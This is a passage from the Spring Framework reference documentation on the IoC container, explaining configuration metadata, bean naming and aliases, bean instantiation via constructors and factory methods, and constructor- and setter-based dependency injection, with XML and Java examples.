backbone of your application and that are managed\nby the Spring IoC __container__ are called __beans__. A bean is an object that is\ninstantiated, assembled, and otherwise managed by a Spring IoC container. Otherwise, a\nbean is simply one of many objects in your application. 
Beans, and the __dependencies__\namong them, are reflected in the __configuration metadata__ used by a container.\n\n\n\n\n[[beans-basics]]\n== Container overview\nThe interface `org.springframework.context.ApplicationContext` represents the Spring IoC\ncontainer and is responsible for instantiating, configuring, and assembling the\naforementioned beans. The container gets its instructions on what objects to\ninstantiate, configure, and assemble by reading configuration metadata. The\nconfiguration metadata is represented in XML, Java annotations, or Java code. It allows\nyou to express the objects that compose your application and the rich interdependencies\nbetween such objects.\n\nSeveral implementations of the `ApplicationContext` interface are supplied\nout-of-the-box with Spring. In standalone applications it is common to create an\ninstance of\n{api-spring-framework}\/context\/support\/ClassPathXmlApplicationContext.html[`ClassPathXmlApplicationContext`]\nor {api-spring-framework}\/context\/support\/FileSystemXmlApplicationContext.html[`FileSystemXmlApplicationContext`].\nWhile XML has been the traditional format for defining configuration metadata, you can\ninstruct the container to use Java annotations or code as the metadata format by\nproviding a small amount of XML configuration to declaratively enable support for these\nadditional metadata formats.\n\nIn most application scenarios, explicit user code is not required to instantiate one or\nmore instances of a Spring IoC container. For example, in a web application scenario,\nsome eight (or so) lines of boilerplate web descriptor XML in the `web.xml` file\nof the application will typically suffice (see <<context-create>>). If you are using the\nhttps:\/\/spring.io\/tools\/sts[Spring Tool Suite] Eclipse-powered development\nenvironment, this boilerplate configuration can easily be created with a few mouse\nclicks or keystrokes.\n\nThe following diagram is a high-level view of how Spring works. Your application classes\nare combined with configuration metadata so that after the `ApplicationContext` is\ncreated and initialized, you have a fully configured and executable system or\napplication.\n\n.The Spring IoC container\nimage::images\/container-magic.png[width=250]\n\n\n\n[[beans-factory-metadata]]\n=== Configuration metadata\n\nAs the preceding diagram shows, the Spring IoC container consumes a form of\n__configuration metadata__; this configuration metadata represents how you as an\napplication developer tell the Spring container to instantiate, configure, and assemble\nthe objects in your application.\n\nConfiguration metadata is traditionally supplied in a simple and intuitive XML format,\nwhich is what most of this chapter uses to convey key concepts and features of the\nSpring IoC container.\n\n[NOTE]\n====\nXML-based metadata is __not__ the only allowed form of configuration metadata. The\nSpring IoC container itself is __totally__ decoupled from the format in which this\nconfiguration metadata is actually written. 
These days many developers choose\n<<beans-java,Java-based configuration>> for their Spring applications.\n====\n\nFor information about using other forms of metadata with the Spring container, see:\n\n* <<beans-annotation-config,Annotation-based configuration>>: Spring 2.5 introduced\n support for annotation-based configuration metadata.\n* <<beans-java,Java-based configuration>>: Starting with Spring 3.0, many features\n provided by the Spring JavaConfig project became part of the core Spring Framework.\n Thus you can define beans external to your application classes by using Java rather\n than XML files. To use these new features, see the `@Configuration`, `@Bean`, `@Import`\n and `@DependsOn` annotations.\n\nSpring configuration consists of at least one and typically more than one bean\ndefinition that the container must manage. XML-based configuration metadata shows these\nbeans configured as `<bean\/>` elements inside a top-level `<beans\/>` element. Java\nconfiguration typically uses `@Bean` annotated methods within a `@Configuration` class.\n\nThese bean definitions correspond to the actual objects that make up your application.\nTypically you define service layer objects, data access objects (DAOs), presentation\nobjects such as Struts `Action` instances, infrastructure objects such as Hibernate\n`SessionFactories`, JMS `Queues`, and so forth. Typically one does not configure\nfine-grained domain objects in the container, because it is usually the responsibility\nof DAOs and business logic to create and load domain objects. However, you can use\nSpring's integration with AspectJ to configure objects that have been created outside\nthe control of an IoC container. See <<aop-atconfigurable,Using AspectJ to\ndependency-inject domain objects with Spring>>.\n\nThe following example shows the basic structure of XML-based configuration metadata:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<bean id=\"...\" class=\"...\">\n\t\t\t<!-- collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<bean id=\"...\" class=\"...\">\n\t\t\t<!-- collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<!-- more bean definitions go here -->\n\n\t<\/beans>\n----\n\nThe `id` attribute is a string that you use to identify the individual bean definition.\nThe `class` attribute defines the type of the bean and uses the fully qualified\nclassname. The value of the id attribute refers to collaborating objects. The XML for\nreferring to collaborating objects is not shown in this example; see\n<<beans-dependencies,Dependencies>> for more information.\n\n\n\n[[beans-factory-instantiation]]\n=== Instantiating a container\n\nInstantiating a Spring IoC container is straightforward. 
The location path or paths\nsupplied to an `ApplicationContext` constructor are actually resource strings that allow\nthe container to load configuration metadata from a variety of external resources, such\nas the local file system, the Java `CLASSPATH`, and so on.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tApplicationContext context =\n\t\tnew ClassPathXmlApplicationContext(new String[] {\"services.xml\", \"daos.xml\"});\n----\n\n[NOTE]\n====\nAfter you learn about Spring's IoC container, you may want to know more about Spring's\n`Resource` abstraction, as described in <<resources>>, which provides a convenient\nmechanism for reading an `InputStream` from locations defined in a URI syntax. In\nparticular, `Resource` paths are used to construct application contexts as described in\n<<resources-app-ctx>>.\n====\n\nThe following example shows the service layer objects configuration file (`services.xml`):\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<!-- services -->\n\n\t\t<bean id=\"petStore\" class=\"org.springframework.samples.jpetstore.services.PetStoreServiceImpl\">\n\t\t\t<property name=\"accountDao\" ref=\"accountDao\"\/>\n\t\t\t<property name=\"itemDao\" ref=\"itemDao\"\/>\n\t\t\t<!-- additional collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<!-- more bean definitions for services go here -->\n\n\t<\/beans>\n----\n\nThe following example shows the data access objects file (`daos.xml`):\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<bean id=\"accountDao\"\n\t\t\tclass=\"org.springframework.samples.jpetstore.dao.jpa.JpaAccountDao\">\n\t\t\t<!-- additional collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<bean id=\"itemDao\" class=\"org.springframework.samples.jpetstore.dao.jpa.JpaItemDao\">\n\t\t\t<!-- additional collaborators and configuration for this bean go here -->\n\t\t<\/bean>\n\n\t\t<!-- more bean definitions for data access objects go here -->\n\n\t<\/beans>\n----\n\nIn the preceding example, the service layer consists of the class `PetStoreServiceImpl`,\nand two data access objects of the types `JpaAccountDao` and `JpaItemDao` (based\non the JPA Object\/Relational mapping standard). The `name` attribute of the `<property\/>`\nelement refers to the name of the JavaBean property, and the `ref` attribute refers to\nthe name of another bean definition. This linkage between `id` and `ref` attributes\nexpresses the dependency between collaborating objects. For details of configuring an\nobject's dependencies, see <<beans-dependencies,Dependencies>>.\n\n\n[[beans-factory-xml-import]]\n==== Composing XML-based configuration metadata\n\nIt can be useful to have bean definitions span multiple XML files. 
Often each individual\nXML configuration file represents a logical layer or module in your architecture.\n\nYou can use the application context constructor to load bean definitions from all these\nXML fragments. This constructor takes multiple `Resource` locations, as was shown in the\nprevious section. Alternatively, use one or more occurrences of the `<import\/>` element\nto load bean definitions from another file or files. For example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<import resource=\"services.xml\"\/>\n\t\t<import resource=\"resources\/messageSource.xml\"\/>\n\t\t<import resource=\"\/resources\/themeSource.xml\"\/>\n\n\t\t<bean id=\"bean1\" class=\"...\"\/>\n\t\t<bean id=\"bean2\" class=\"...\"\/>\n\t<\/beans>\n----\n\nIn the preceding example, external bean definitions are loaded from three files:\n`services.xml`, `messageSource.xml`, and `themeSource.xml`. All location paths are\nrelative to the definition file doing the importing, so `services.xml` must be in the\nsame directory or classpath location as the file doing the importing, while\n`messageSource.xml` and `themeSource.xml` must be in a `resources` location below the\nlocation of the importing file. As you can see, a leading slash is ignored, but given\nthat these paths are relative, it is better form not to use the slash at all. The\ncontents of the files being imported, including the top level `<beans\/>` element, must\nbe valid XML bean definitions according to the Spring Schema.\n\n[NOTE]\n====\nIt is possible, but not recommended, to reference files in parent directories using a\nrelative \"..\/\" path. Doing so creates a dependency on a file that is outside the current\napplication. In particular, this reference is not recommended for \"classpath:\" URLs (for\nexample, \"classpath:..\/services.xml\"), where the runtime resolution process chooses the\n\"nearest\" classpath root and then looks into its parent directory. Classpath\nconfiguration changes may lead to the choice of a different, incorrect directory.\n\nYou can always use fully qualified resource locations instead of relative paths: for\nexample, \"file:C:\/config\/services.xml\" or \"classpath:\/config\/services.xml\". However, be\naware that you are coupling your application's configuration to specific absolute\nlocations. It is generally preferable to keep an indirection for such absolute\nlocations, for example, through \"${...}\" placeholders that are resolved against JVM\nsystem properties at runtime.\n====\n\n\n\n[[beans-factory-client]]\n=== Using the container\n\nThe `ApplicationContext` is the interface for an advanced factory capable of maintaining\na registry of different beans and their dependencies. Using the method `T getBean(String\nname, Class<T> requiredType)` you can retrieve instances of your beans.\n\nThe `ApplicationContext` enables you to read bean definitions and access them as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ create and configure beans\n\tApplicationContext context =\n\t\tnew ClassPathXmlApplicationContext(new String[] {\"services.xml\", \"daos.xml\"});\n\n\t\/\/ retrieve configured instance\n\tPetStoreService service = context.getBean(\"petStore\", PetStoreService.class);\n\n\t\/\/ use configured instance\n\tList<String> userList = service.getUsernameList();\n----\n\nYou use `getBean()` to retrieve instances of your beans. 
The `ApplicationContext`\ninterface has a few other methods for retrieving beans, but ideally your application\ncode should never use them. Indeed, your application code should have no calls to the\n`getBean()` method at all, and thus no dependency on Spring APIs at all. For example,\nSpring's integration with web frameworks provides for dependency injection for various\nweb framework classes such as controllers and JSF-managed beans.\n\n\n\n\n[[beans-definition]]\n== Bean overview\nA Spring IoC container manages one or more __beans__. These beans are created with the\nconfiguration metadata that you supply to the container, for example, in the form of XML\n`<bean\/>` definitions.\n\nWithin the container itself, these bean definitions are represented as `BeanDefinition`\nobjects, which contain (among other information) the following metadata:\n\n* __A package-qualified class name:__ typically the actual implementation class of the\n bean being defined.\n* Bean behavioral configuration elements, which state how the bean should behave in the\n container (scope, lifecycle callbacks, and so forth).\n* References to other beans that are needed for the bean to do its work; these\n references are also called __collaborators__ or __dependencies__.\n* Other configuration settings to set in the newly created object, for example, the\n number of connections to use in a bean that manages a connection pool, or the size\n limit of the pool.\n\nThis metadata translates to a set of properties that make up each bean definition.\n\n[[beans-factory-bean-definition-tbl]]\n.The bean definition\n|===\n| Property| Explained in...\n\n| class\n| <<beans-factory-class>>\n\n| name\n| <<beans-beanname>>\n\n| scope\n| <<beans-factory-scopes>>\n\n| constructor arguments\n| <<beans-factory-collaborators>>\n\n| properties\n| <<beans-factory-collaborators>>\n\n| autowiring mode\n| <<beans-factory-autowire>>\n\n| lazy-initialization mode\n| <<beans-factory-lazy-init>>\n\n| initialization method\n| <<beans-factory-lifecycle-initializingbean>>\n\n| destruction method\n| <<beans-factory-lifecycle-disposablebean>>\n|===\n\nIn addition to bean definitions that contain information on how to create a specific\nbean, the `ApplicationContext` implementations also permit the registration of existing\nobjects that are created outside the container by users. This is done by accessing the\nApplicationContext's `BeanFactory` via the `getBeanFactory()` method, which returns the\n`DefaultListableBeanFactory` implementation. `DefaultListableBeanFactory`\nsupports this registration through the methods `registerSingleton(..)` and\n`registerBeanDefinition(..)`. However, typical applications work solely with beans\ndefined through metadata bean definitions.\n\n
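The following minimal sketch shows such a registration (`myConnectionPool` stands in for\nsome existing object that was created outside the container):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tGenericApplicationContext context = new GenericApplicationContext();\n\n\t\/\/ hand the existing object to the container, as early as possible\n\tcontext.getBeanFactory().registerSingleton(\"connectionPool\", myConnectionPool);\n\n\tcontext.refresh();\n----\n\n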
[NOTE]\n====\nBean metadata and manually supplied singleton instances need to be registered as early\nas possible, in order for the container to properly reason about them during autowiring\nand other introspection steps. While overriding of existing metadata and existing\nsingleton instances is supported to some degree, the registration of new beans at\nruntime (concurrently with live access to the factory) is not officially supported and\nmay lead to concurrent access exceptions and\/or inconsistent state in the bean container.\n====\n\n\n\n[[beans-beanname]]\n=== Naming beans\n\nEvery bean has one or more identifiers. These identifiers must be unique within the\ncontainer that hosts the bean. A bean usually has only one identifier, but if it\nrequires more than one, the extra ones can be considered aliases.\n\nIn XML-based configuration metadata, you use the `id` and\/or `name` attributes\nto specify the bean identifier(s). The `id` attribute allows you to specify\nexactly one id. Conventionally, these names are alphanumeric ('myBean',\n'fooService', etc.), but may contain special characters as well. If you want to\nintroduce other aliases to the bean, you can also specify them in the `name`\nattribute, separated by a comma (`,`), semicolon (`;`), or white space. As a\nhistorical note, in versions prior to Spring 3.1, the `id` attribute was\ndefined as an `xsd:ID` type, which constrained possible characters. As of 3.1,\nit is defined as an `xsd:string` type. Note that bean `id` uniqueness is still\nenforced by the container, though no longer by XML parsers.\n\nYou are not required to supply a name or id for a bean. If no name or id is supplied\nexplicitly, the container generates a unique name for that bean. However, if you want to\nrefer to that bean by name, through the use of the `ref` element or\n<<beans-servicelocator,Service Locator>> style lookup, you must provide a name.\nMotivations for not supplying a name are related to using <<beans-inner-beans,inner\nbeans>> and <<beans-factory-autowire,autowiring collaborators>>.\n\n.Bean Naming Conventions\n****\nThe convention is to use the standard Java convention for instance field names when\nnaming beans. That is, bean names start with a lowercase letter, and are camel-cased\nfrom then on. Examples of such names would be (without quotes) `'accountManager'`,\n`'accountService'`, `'userDao'`, `'loginController'`, and so forth.\n\nNaming beans consistently makes your configuration easier to read and understand, and if\nyou are using Spring AOP it helps a lot when applying advice to a set of beans related\nby name.\n****\n\n[NOTE]\n====\nWith component scanning in the classpath, Spring generates bean names for unnamed\ncomponents, following the rules above: essentially, taking the simple class name\nand turning its initial character to lower-case. However, in the (unusual) special\ncase when there is more than one character and both the first and second characters\nare upper case, the original casing gets preserved. These are the same rules as\ndefined by `java.beans.Introspector.decapitalize` (which Spring is using here).\n====\n\n\n[[beans-beanname-alias]]\n==== Aliasing a bean outside the bean definition\n\nIn a bean definition itself, you can supply more than one name for the bean, by using a\ncombination of up to one name specified by the `id` attribute, and any number of other\nnames in the `name` attribute. These names can be equivalent aliases to the same bean,\nand are useful for some situations, such as allowing each component in an application to\nrefer to a common dependency by using a bean name that is specific to that component\nitself.\n\nSpecifying all aliases where the bean is actually defined is not always adequate,\nhowever. It is sometimes desirable to introduce an alias for a bean that is defined\nelsewhere. This is commonly the case in large systems where configuration is split\namongst each subsystem, each subsystem having its own set of object definitions. 
In
XML-based configuration metadata, you can use the `<alias/>` element to accomplish this.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<alias name="fromName" alias="toName"/>
----

In this case, a bean in the same container named `fromName` may also,
after the use of this alias definition, be referred to as `toName`.

For example, the configuration metadata for subsystem A may refer to a DataSource via
the name `subsystemA-dataSource`. The configuration metadata for subsystem B may refer to
a DataSource via the name `subsystemB-dataSource`. When composing the main application
that uses both these subsystems, the main application refers to the DataSource via the
name `myApp-dataSource`. To have all three names refer to the same object, you add to the
MyApp configuration metadata the following alias definitions:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<alias name="subsystemA-dataSource" alias="subsystemB-dataSource"/>
	<alias name="subsystemA-dataSource" alias="myApp-dataSource" />
----

Now each component and the main application can refer to the dataSource through a name
that is unique and guaranteed not to clash with any other definition (effectively
creating a namespace), yet they refer to the same bean.

.Java-configuration
****
If you are using Java-configuration, the `@Bean` annotation can be used to provide
aliases; see <<beans-java-bean-annotation>> for details.
****

[[beans-factory-class]]
=== Instantiating beans

A bean definition essentially is a recipe for creating one or more objects. The
container looks at the recipe for a named bean when asked, and uses the configuration
metadata encapsulated by that bean definition to create (or acquire) an actual object.

If you use XML-based configuration metadata, you specify the type (or class) of object
that is to be instantiated in the `class` attribute of the `<bean/>` element. This
`class` attribute, which internally is a `Class` property on a `BeanDefinition`
instance, is usually mandatory. (For exceptions, see
<<beans-factory-class-instance-factory-method>> and <<beans-child-bean-definitions>>.)
You use the `Class` property in one of two ways:

* Typically, to specify the bean class to be constructed in the case where the container
 itself directly creates the bean by calling its constructor reflectively, somewhat
 equivalent to Java code using the `new` operator.
* To specify the actual class containing the `static` factory method that will be
 invoked to create the object, in the less common case where the container invokes a
 `static` __factory__ method on a class to create the bean. The object type returned
 from the invocation of the `static` factory method may be the same class or another
 class entirely.

.Inner class names
****
If you want to configure a bean definition for a `static` nested class, you have to use
the __binary__ name of the nested class.

For example, if you have a class called `Foo` in the `com.example` package, and this
`Foo` class has a `static` nested class called `Bar`, the value of the `'class'`
attribute on a bean definition would be...

`com.example.Foo$Bar`

Notice the use of the `$` character in the name to separate the nested class name from
the outer class name.
****


[[beans-factory-class-ctor]]
==== Instantiation with a constructor

When you create a bean by the constructor approach, all normal classes are usable by and
compatible with Spring.
That is, the class being developed does not need to implement\nany specific interfaces or to be coded in a specific fashion. Simply specifying the bean\nclass should suffice. However, depending on what type of IoC you use for that specific\nbean, you may need a default (empty) constructor.\n\nThe Spring IoC container can manage virtually __any__ class you want it to manage; it is\nnot limited to managing true JavaBeans. Most Spring users prefer actual JavaBeans with\nonly a default (no-argument) constructor and appropriate setters and getters modeled\nafter the properties in the container. You can also have more exotic non-bean-style\nclasses in your container. If, for example, you need to use a legacy connection pool\nthat absolutely does not adhere to the JavaBean specification, Spring can manage it as\nwell.\n\nWith XML-based configuration metadata you can specify your bean class as follows:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\"\/>\n\n\t<bean name=\"anotherExample\" class=\"examples.ExampleBeanTwo\"\/>\n----\n\nFor details about the mechanism for supplying arguments to the constructor (if required)\nand setting object instance properties after the object is constructed, see\n<<beans-factory-collaborators,Injecting Dependencies>>.\n\n\n[[beans-factory-class-static-factory-method]]\n==== Instantiation with a static factory method\n\nWhen defining a bean that you create with a static factory method, you use the `class`\nattribute to specify the class containing the `static` factory method and an attribute\nnamed `factory-method` to specify the name of the factory method itself. You should be\nable to call this method (with optional arguments as described later) and return a live\nobject, which subsequently is treated as if it had been created through a constructor.\nOne use for such a bean definition is to call `static` factories in legacy code.\n\nThe following bean definition specifies that the bean will be created by calling a\nfactory-method. The definition does not specify the type (class) of the returned object,\nonly the class containing the factory method. In this example, the `createInstance()`\nmethod must be a __static__ method.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"clientService\"\n\t\tclass=\"examples.ClientService\"\n\t\tfactory-method=\"createInstance\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ClientService {\n\t\tprivate static ClientService clientService = new ClientService();\n\t\tprivate ClientService() {}\n\n\t\tpublic static ClientService createInstance() {\n\t\t\treturn clientService;\n\t\t}\n\t}\n----\n\nFor details about the mechanism for supplying (optional) arguments to the factory method\nand setting object instance properties after the object is returned from the factory,\nsee <<beans-factory-properties-detailed,Dependencies and configuration in detail>>.\n\n\n[[beans-factory-class-instance-factory-method]]\n==== Instantiation using an instance factory method\n\nSimilar to instantiation through a <<beans-factory-class-static-factory-method,static\nfactory method>>, instantiation with an instance factory method invokes a non-static\nmethod of an existing bean from the container to create a new bean. 
To use this
mechanism, leave the `class` attribute empty, and in the `factory-bean` attribute,
specify the name of a bean in the current (or parent/ancestor) container that contains
the instance method that is to be invoked to create the object. Set the name of the
factory method itself with the `factory-method` attribute.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<!-- the factory bean, which contains a method called createInstance() -->
	<bean id="serviceLocator" class="examples.DefaultServiceLocator">
		<!-- inject any dependencies required by this locator bean -->
	</bean>

	<!-- the bean to be created via the factory bean -->
	<bean id="clientService"
		factory-bean="serviceLocator"
		factory-method="createClientServiceInstance"/>
----

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class DefaultServiceLocator {

		private static ClientService clientService = new ClientServiceImpl();
		private DefaultServiceLocator() {}

		public ClientService createClientServiceInstance() {
			return clientService;
		}
	}
----

One factory class can also hold more than one factory method as shown here:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="serviceLocator" class="examples.DefaultServiceLocator">
		<!-- inject any dependencies required by this locator bean -->
	</bean>

	<bean id="clientService"
		factory-bean="serviceLocator"
		factory-method="createClientServiceInstance"/>

	<bean id="accountService"
		factory-bean="serviceLocator"
		factory-method="createAccountServiceInstance"/>
----

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class DefaultServiceLocator {

		private static ClientService clientService = new ClientServiceImpl();
		private static AccountService accountService = new AccountServiceImpl();

		private DefaultServiceLocator() {}

		public ClientService createClientServiceInstance() {
			return clientService;
		}

		public AccountService createAccountServiceInstance() {
			return accountService;
		}

	}
----

This approach shows that the factory bean itself can be managed and configured through
dependency injection (DI). See <<beans-factory-properties-detailed,Dependencies and
configuration in detail>>.

[NOTE]
====
In Spring documentation, __factory bean__ refers to a bean that is configured in the
Spring container that will create objects through an
<<beans-factory-class-instance-factory-method,instance>> or
<<beans-factory-class-static-factory-method,static>> factory method. By contrast,
`FactoryBean` (notice the capitalization) refers to a Spring-specific
<<beans-factory-extension-factorybean,`FactoryBean`>>.
====




[[beans-dependencies]]
== Dependencies
A typical enterprise application does not consist of a single object (or bean in the
Spring parlance). Even the simplest application has a few objects that work together to
present what the end-user sees as a coherent application.
This next section explains how
you go from defining a number of bean definitions that stand alone to a fully realized
application where objects collaborate to achieve a goal.



[[beans-factory-collaborators]]
=== Dependency Injection

__Dependency injection__ (DI) is a process whereby objects define their dependencies,
that is, the other objects they work with, only through constructor arguments, arguments
to a factory method, or properties that are set on the object instance after it is
constructed or returned from a factory method. The container then __injects__ those
dependencies when it creates the bean. This process is fundamentally the inverse, hence
the name __Inversion of Control__ (IoC), of the bean itself controlling the instantiation
or location of its dependencies on its own by using direct construction of classes, or
the __Service Locator__ pattern.

Code is cleaner with the DI principle and decoupling is more effective when objects are
provided with their dependencies. The object does not look up its dependencies, and does
not know the location or class of the dependencies. As such, your classes become easier
to test, in particular when the dependencies are on interfaces or abstract base classes,
which allow for stub or mock implementations to be used in unit tests.

DI exists in two major variants: <<beans-constructor-injection,Constructor-based
dependency injection>> and <<beans-setter-injection,Setter-based dependency injection>>.


[[beans-constructor-injection]]
==== Constructor-based dependency injection

__Constructor-based__ DI is accomplished by the container invoking a constructor with a
number of arguments, each representing a dependency. Calling a `static` factory method
with specific arguments to construct the bean is nearly equivalent, and this discussion
treats arguments to a constructor and to a `static` factory method similarly. The
following example shows a class that can only be dependency-injected with constructor
injection. Notice that there is nothing __special__ about this class; it is a POJO that
has no dependencies on container-specific interfaces, base classes, or annotations.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class SimpleMovieLister {

		// the SimpleMovieLister has a dependency on a MovieFinder
		private MovieFinder movieFinder;

		// a constructor so that the Spring container can inject a MovieFinder
		public SimpleMovieLister(MovieFinder movieFinder) {
			this.movieFinder = movieFinder;
		}

		// business logic that actually uses the injected MovieFinder is omitted...

	}
----

[[beans-factory-ctor-arguments-resolution]]
===== Constructor argument resolution

Constructor argument resolution matching occurs using the argument's type. If no
potential ambiguity exists in the constructor arguments of a bean definition, then the
order in which the constructor arguments are defined in a bean definition is the order
in which those arguments are supplied to the appropriate constructor when the bean is
being instantiated. Consider the following class:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	package x.y;

	public class Foo {

		public Foo(Bar bar, Baz baz) {
			// ...
		}

	}
----

No potential ambiguity exists, assuming that `Bar` and `Baz` classes are not related by
inheritance.
Thus the following configuration works fine, and you do not need to specify
the constructor argument indexes and/or types explicitly in the `<constructor-arg/>`
element.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<beans>
		<bean id="foo" class="x.y.Foo">
			<constructor-arg ref="bar"/>
			<constructor-arg ref="baz"/>
		</bean>

		<bean id="bar" class="x.y.Bar"/>

		<bean id="baz" class="x.y.Baz"/>
	</beans>
----

When another bean is referenced, the type is known, and matching can occur (as was the
case with the preceding example). When a simple type is used, such as
`<value>true</value>`, Spring cannot determine the type of the value, and so cannot match
by type without help. Consider the following class:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	package examples;

	public class ExampleBean {

		// Number of years to calculate the Ultimate Answer
		private int years;

		// The Answer to Life, the Universe, and Everything
		private String ultimateAnswer;

		public ExampleBean(int years, String ultimateAnswer) {
			this.years = years;
			this.ultimateAnswer = ultimateAnswer;
		}

	}
----

.[[beans-factory-ctor-arguments-type]]Constructor argument type matching
--
In the preceding scenario, the container __can__ use type matching with simple types if
you explicitly specify the type of the constructor argument using the `type` attribute.
For example:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="exampleBean" class="examples.ExampleBean">
		<constructor-arg type="int" value="7500000"/>
		<constructor-arg type="java.lang.String" value="42"/>
	</bean>
----
--

.[[beans-factory-ctor-arguments-index]]Constructor argument index
--
Use the `index` attribute to specify explicitly the index of constructor arguments. For
example:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="exampleBean" class="examples.ExampleBean">
		<constructor-arg index="0" value="7500000"/>
		<constructor-arg index="1" value="42"/>
	</bean>
----

In addition to resolving the ambiguity of multiple simple values, specifying an index
resolves ambiguity where a constructor has two arguments of the same type. Note that the
__index is 0 based__.
--

.[[beans-factory-ctor-arguments-name]]Constructor argument name
--
You can also use the constructor parameter name for value disambiguation:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="exampleBean" class="examples.ExampleBean">
		<constructor-arg name="years" value="7500000"/>
		<constructor-arg name="ultimateAnswer" value="42"/>
	</bean>
----

Keep in mind that, to make this work out of the box, your code must be compiled with the
debug flag enabled so that Spring can look up the parameter name from the constructor.
If you can't compile your code with the debug flag (or don't want to), you can use the
http://download.oracle.com/javase/6/docs/api/java/beans/ConstructorProperties.html[@ConstructorProperties]
JDK annotation to explicitly name your constructor arguments.
The sample class would
then have to look as follows:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	package examples;

	public class ExampleBean {

		// Fields omitted

		@ConstructorProperties({"years", "ultimateAnswer"})
		public ExampleBean(int years, String ultimateAnswer) {
			this.years = years;
			this.ultimateAnswer = ultimateAnswer;
		}

	}
----
--


[[beans-setter-injection]]
==== Setter-based dependency injection

__Setter-based__ DI is accomplished by the container calling setter methods on your
beans after invoking a no-argument constructor or no-argument `static` factory method to
instantiate your bean.

The following example shows a class that can only be dependency-injected using pure
setter injection. This class is conventional Java. It is a POJO that has no dependencies
on container-specific interfaces, base classes, or annotations.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class SimpleMovieLister {

		// the SimpleMovieLister has a dependency on the MovieFinder
		private MovieFinder movieFinder;

		// a setter method so that the Spring container can inject a MovieFinder
		public void setMovieFinder(MovieFinder movieFinder) {
			this.movieFinder = movieFinder;
		}

		// business logic that actually uses the injected MovieFinder is omitted...

	}
----

The `ApplicationContext` supports constructor-based and setter-based DI for the beans it
manages. It also supports setter-based DI after some dependencies have already been
injected through the constructor approach. You configure the dependencies in the form of
a `BeanDefinition`, which you use in conjunction with `PropertyEditor` instances to
convert properties from one format to another. However, most Spring users do not work
with these classes directly (i.e., programmatically) but rather with XML `bean`
definitions, annotated components (i.e., classes annotated with `@Component`,
`@Controller`, etc.), or `@Bean` methods in Java-based `@Configuration` classes. These
sources are then converted internally into instances of `BeanDefinition` and used to
load an entire Spring IoC container instance.

.Constructor-based or setter-based DI?
****
Since you can mix constructor-based and setter-based DI, it is a good rule of thumb to
use constructors for _mandatory dependencies_ and setter methods or configuration methods
for _optional dependencies_. Note that the <<beans-required-annotation,@Required>>
annotation on a setter method can be used to make the property a required dependency.

The Spring team generally advocates constructor injection as it enables one to implement
application components as _immutable objects_ and to ensure that required dependencies
are not `null`. Furthermore, constructor-injected components are always returned to client
(calling) code in a fully initialized state. As a side note, a large number of constructor
arguments is a _bad code smell_, implying that the class likely has too many
responsibilities and should be refactored to better address proper separation of concerns.

Setter injection should primarily be used only for optional dependencies that can be
assigned reasonable default values within the class. Otherwise, not-null checks must be
performed everywhere the code uses the dependency. One benefit of setter injection is that
setter methods make objects of that class amenable to reconfiguration or re-injection
later.
